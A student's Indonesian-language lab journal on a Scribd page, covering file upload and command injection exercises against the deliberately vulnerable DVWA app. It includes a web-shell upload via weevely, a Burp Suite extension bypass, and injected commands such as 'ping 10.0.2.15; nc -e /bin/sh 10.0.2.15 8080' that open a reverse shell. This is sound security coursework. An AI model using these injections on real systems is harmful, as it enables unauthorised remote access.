Scribd Logo
Unggah

Selamat datang di Scribd!

  • Andrew Dwi Saputra - Journal File Upload & Code Vulnerabilities

    Diunggah oleh

    Andrew
    17 tayangan12 halaman
    code vulnerabilities

    Judul Asli

    42621007_Andrew Dwi Saputra_Journal File Upload & Code Vulnerabilities

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    DOCX, PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini
    code vulnerabilities

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai DOCX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    17 tayangan12 halaman

    Andrew Dwi Saputra - Journal File Upload & Code Vulnerabilities

    Diunggah oleh

    Andrew
    code vulnerabilities

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai DOCX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 12

    D4 Teknik Multimedia dan Jaringan

    Jurusan Teknik Elektro


    Politeknik Negeri Ujung Pandang

    LEARNING JOURNAL
    KEAMANAN INFORMASI
    Nama Lengkap : Andrew Dwi Saputra
    NIM : 42621007
    Kelas : 3A TMJ
    Judul Praktikum : Upload & Code Vulnerabilities
    Waktu Praktikum : 09 Desember 2023

    No Job Praktikum Hasil Praktikum Keterangan


    1. File Upload Akses website DVWA pada
    Vulnerabilities Kali Linux
    Username: admin
    Password: password

    2. File Upload Meng-upload website di


    Vulnerabilities metasploitable

    Hasil upload gambar


    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    3.

    4. File Upload Upload php file


    Vulnerabilities

    5. File Upload Upload php file melalui


    DVWA
    Vulnerabilities
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    6. File Upload Koneksi melalui weevely dan


    Vulnerabilities mengakses perintah linux

    7. File Upload Menjalankan Burpsuite


    Vulnerabilities

    8. File Upload Atur setting di proxy pada


    Vulnerabilities browser Kali Linux
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    9. File Upload Atur setting di proxy pada


    Vulnerabilities browser Kali Linux

    10. File Upload Menguji Burpsuite


    Vulnerabilities

    11. File Upload Intercept proses upload


    Vulnerabilities website
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    12. File Upload Intercept proses upload


    Vulnerabilities website

    13. File Upload Close Burpsuite dan


    Vulnerabilities kembalikan pengaturan ke
    No Proxy untuk pengujian
    teknik selanjutnya

    14. File Upload Merubah pengaturan DVWA


    Vulnerabilities Security ke Medium
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    15. File Upload Perubahan DVWA Security


    Vulnerabilities dari Low ke Medium
    menyebabkan hanya file
    image yang bisa ter-upload

    16. File Upload Jalankan Burpsuite dan


    Vulnerabilities Setting Proxy
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    17. File Upload Kembali ke Terminal untuk


    Vulnerabilities pengujian koneksi

    18. File Upload Menonaktifkan Intercept dan


    Vulnerabilities Rubah DVWA Security ke
    High

    19. File Upload Upload File jpg


    Vulnerabilities

    20. File Upload Upload File php yang telah


    Vulnerabilities dirubah jadi jpg
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    21. File Upload Upload File php yang telah


    Vulnerabilities dirubah jadi jpg. Klik
    Forward untuk meneruskan
    proses upload, dan proses
    Upload telah berhasil

    22. Code Memilih Command


    Vulnerabilities Execution

    23. Code Masukkan IP Kali Linux


    Vulnerabilities
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    24. Code Buka console Kali Linux dan


    Vulnerabilities jalankan perintah-
    perintahnya

    25. Code Kembali ke website DVWA,


    Vulnerabilities kemudian ping 10.0.2.15;
    pwd

    26. Code Jika Error Entered IP


    Vulnerabilities Address, maka yang
    dilakukan adalah: 1. Tekan
    CTRL + SHIFT + i 2. Pilih
    STORAGE – COOKIES –
    SECURITY 3. Rubah value
    pada security dari high
    menjadi low 4. Kemudian
    Refresh halaman

    27. Code Buka console Kali Linux dan


    Vulnerabilities jalankan net cat
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    28. Code Kembali ke website DVWA,


    Vulnerabilities kemudian ping 10.0.2.15; nc
    -e /bin/sh 10.0.2.15 8080

    29. Code Lihat respond di console


    Vulnerabilities Linux
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    30. Code Buka website DVWA, pilih


    Vulnerabilities DVWA Security level
    menjadi medium

    31. Code Ping ip kali linux pada


    Vulnerabilities Command Execution

    32. Code Mencoba ping dengan


    Vulnerabilities 10.0.2.15;pwd. Tidak ada
    hasil karena security level
    ditingkatkan menjadi
    medium

    33. Code Kembali ke console kali


    Vulnerabilities linux dan jalankan perintah
    berikut

    34. Code Kembali ke website DVWA


    Vulnerabilities dan ping 10.0.2.15 | pwd
    D4 Teknik Multimedia dan Jaringan
    Jurusan Teknik Elektro
    Politeknik Negeri Ujung Pandang

    35. Code Buka console Kali Linux dan


    Vulnerabilities jalankan net cat

    36. Code Kembali ke website DVWA,


    Vulnerabilities kemudian ping 10.0.2.15 | nc
    -e /bin/sh 10.0.2.15 8080

    37. Code Lihat respond di console


    Vulnerabilities Linux dan Kita bisa masuk
    ke sistem dan mengakses file

    38. Code Untuk meningkatkan


    Vulnerabilities pengamanan terhadap code
    vulnerabilities, rubah level
    security menjadi high

    Makassar, 11 Desember 2023

    TTD

    Andrew Dwi Saputra

    Anda mungkin juga menyukai